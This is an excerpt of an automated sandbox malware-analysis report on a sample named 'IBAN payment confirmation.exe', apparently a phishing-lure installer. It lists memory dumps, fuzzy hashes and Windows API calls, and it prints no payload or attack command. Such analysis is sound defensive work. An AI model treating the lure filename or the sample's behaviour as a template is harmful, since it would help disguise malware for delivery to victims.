                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                                              • Instruction ID: 5ff8dc76d646c522b35349404ae71f3a07db7e5a5a41cf42f501ef55767b32d6
                                                                                                                              • Opcode Fuzzy Hash: 7c1b3bbb7fb5d360c352e29dce0ca82793dba8b39a20caf6091836a7e5acd446
                                                                                                                              • Instruction Fuzzy Hash: DD913470E04229CBEF28CF98C8547ADBBB1FF44305F15816AD852BB291C7789996DF44
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                                              • Instruction ID: bb31d40f455f6cff8f0b7d4569728449f81f985eb729d97d8cba9c35205a948c
                                                                                                                              • Opcode Fuzzy Hash: 06a588dc36723823e64c1d76eb6b79df0e0f5c7b74692a20a357622d355e40c3
                                                                                                                              • Instruction Fuzzy Hash: A6814471E04228CBDF24CFA8C844BADBBB1FF44305F25816AD456BB281C7789996DF44
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                                              • Instruction ID: e59bb743c0d69fedc8ec9c1b53f92d0ee49f9853fc7f4c6d73f4ee5c7875ed1f
                                                                                                                              • Opcode Fuzzy Hash: 72aa8ec3dd0942b5b71c471d9b9626f4b4465e3dfbf4f8c787812f56ef585442
                                                                                                                              • Instruction Fuzzy Hash: FE816671E04228DBDF24CFA8C8447ADBBB0FF44305F15816AD856BB281C7786996DF44
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                                              • Instruction ID: 9556348457f1f5f1301c48e47fc8538a45dff02eab8277f34011f15b85b09a92
                                                                                                                              • Opcode Fuzzy Hash: 1d7d6eeb6ae866c31b6fd6fb1bb683d5497ea3b6253a7880f6caf84b5ad72384
                                                                                                                              • Instruction Fuzzy Hash: 43711271E00228DBDF28CF98C854BADBBB1FF48305F15806AD816BB281C7789996DF54
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                                              • Instruction ID: ef61438920200bd82941886013112b5956151ce3a95704f571d29bdd470ffe0d
                                                                                                                              • Opcode Fuzzy Hash: 55af2c983f537d9a3a53cfac4a449f3e0c8fe7d310f5448a54a9ff87f60f3244
                                                                                                                              • Instruction Fuzzy Hash: FF713571E00228DBDF28CF98C854BADBBB1FF44305F15806AD856BB291C7789996DF44
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                                              • Instruction ID: 0528ad5c4640a45b82c18dce6d1929194436f5f2edf35a138e23b2c729619556
                                                                                                                              • Opcode Fuzzy Hash: 720b16b0405195766e324cd34a7adf45238a3bda3f5e9f89198b3f7d2eee93b7
                                                                                                                              • Instruction Fuzzy Hash: AD714671E00228DBDF28CF98C854BADBBB1FF44305F15806AD816BB291C778AA56DF44
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                                                                                                                • Part of subcall function 00405194: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                                                                                • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                                                                                • Part of subcall function 00405194: lstrcatW.KERNEL32(004216B0,00402D94,00402D94,004216B0,00000000,00000000,00000000), ref: 004051EF
                                                                                                                                • Part of subcall function 00405194: SetWindowTextW.USER32(004216B0,004216B0), ref: 00405201
                                                                                                                                • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                                                                                • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                                                                                • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                                                                                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 334405425-0
                                                                                                                              • Opcode ID: ec4ed1b09714f1aa9f835f2dbd5309446028e52bc8e450eb177df983279e41a5
                                                                                                                              • Instruction ID: 2e01ab74a4c934f7e6015694823d512690d69bb111ffb1ad89b514660c000c84
                                                                                                                              • Opcode Fuzzy Hash: ec4ed1b09714f1aa9f835f2dbd5309446028e52bc8e450eb177df983279e41a5
                                                                                                                              • Instruction Fuzzy Hash: 65219871904215F6CF106F95CE48ADEBAB4AB04358F70417BF601B51E0D7B94D41DA6D
                                                                                                                              APIs
                                                                                                                              • GlobalFree.KERNEL32(005220D0), ref: 00401B92
                                                                                                                              • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BA4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$AllocFree
                                                                                                                              • String ID: Call
                                                                                                                              • API String ID: 3394109436-1824292864
                                                                                                                              • Opcode ID: fa756fabfd28fe389d560697bb7080b79a52f5873eaf941668f0573c6073e784
                                                                                                                              • Instruction ID: 0d74e211bf3f77f63613a954a16e526c6d046d9130d490d95d437df5f5263094
                                                                                                                              • Opcode Fuzzy Hash: fa756fabfd28fe389d560697bb7080b79a52f5873eaf941668f0573c6073e784
                                                                                                                              • Instruction Fuzzy Hash: 2F2196B2604501ABCB10EB94DE8599FB3A8EB44318B24053BF541B32D1D778AC019FAD
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1955740112.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1955670729.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1955830889.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1955921061.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: EnumErrorLastWindows
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 14984897-0
                                                                                                                              • Opcode ID: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
                                                                                                                              • Instruction ID: 346bc7c3d20138bcfc700b2b1684b28c90b224d1e8b0175626a50a5a3d135241
                                                                                                                              • Opcode Fuzzy Hash: 56b0631d48e3d5b058df37f2c0bf37a0ba3bd5c787ddc121e10f68fdc3118472
                                                                                                                              • Instruction Fuzzy Hash: 0E51A2BA905215DFFB10DFA4DC8275937A8EB443D4F22C42AEA049721DCF34A991CB55
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001FB,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsl71F.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3677997916-0
                                                                                                                              • Opcode ID: 73cf7011403a251bc8a8568549cb6b978d79a09763c44604493d81e759c4a0f6
                                                                                                                              • Instruction ID: d36666ef43ed86f5efc63e353f879872970ea39244a0d469f35bb849977519d9
                                                                                                                              • Opcode Fuzzy Hash: 73cf7011403a251bc8a8568549cb6b978d79a09763c44604493d81e759c4a0f6
                                                                                                                              • Instruction Fuzzy Hash: 3A117371915205EEDF14CFA0C6889AFB7B4EF40359F20843FE042A72D0D7B85A41DB5A
                                                                                                                              APIs
                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3850602802-0
                                                                                                                              • Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                                                                                              • Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
                                                                                                                              • Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                                                                                              • Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D
                                                                                                                              APIs
                                                                                                                              • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$EnableShow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1136574915-0
                                                                                                                              • Opcode ID: be98ff442c713d64b2aef3360118115c19863b97becbdb99d22bcda0d6aeac62
                                                                                                                              • Instruction ID: 4da21f5269aa326e6de85e385cb401583d451f1930efd1289825586750b78c36
                                                                                                                              • Opcode Fuzzy Hash: be98ff442c713d64b2aef3360118115c19863b97becbdb99d22bcda0d6aeac62
                                                                                                                              • Instruction Fuzzy Hash: 84E08CB2B04104DBDB50AFF4AA889DD7378AB90369B20087BF402F10D1C2B86C008E3E
                                                                                                                              APIs
                                                                                                                              • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\IBAN payment confirmation.exe,80000000,00000003), ref: 00405B5A
                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942147340.000000000045D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000045F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942227736.000000000049F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_IBAN payment confirmation.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$AttributesCreate
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 415043291-0
                                                                                                                              • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                                              • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                                                                                              • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                                                                                              • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                                                                                              APIs
                                                                                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                                                                                                                • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1942118512.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1942104417.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.1942133333.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
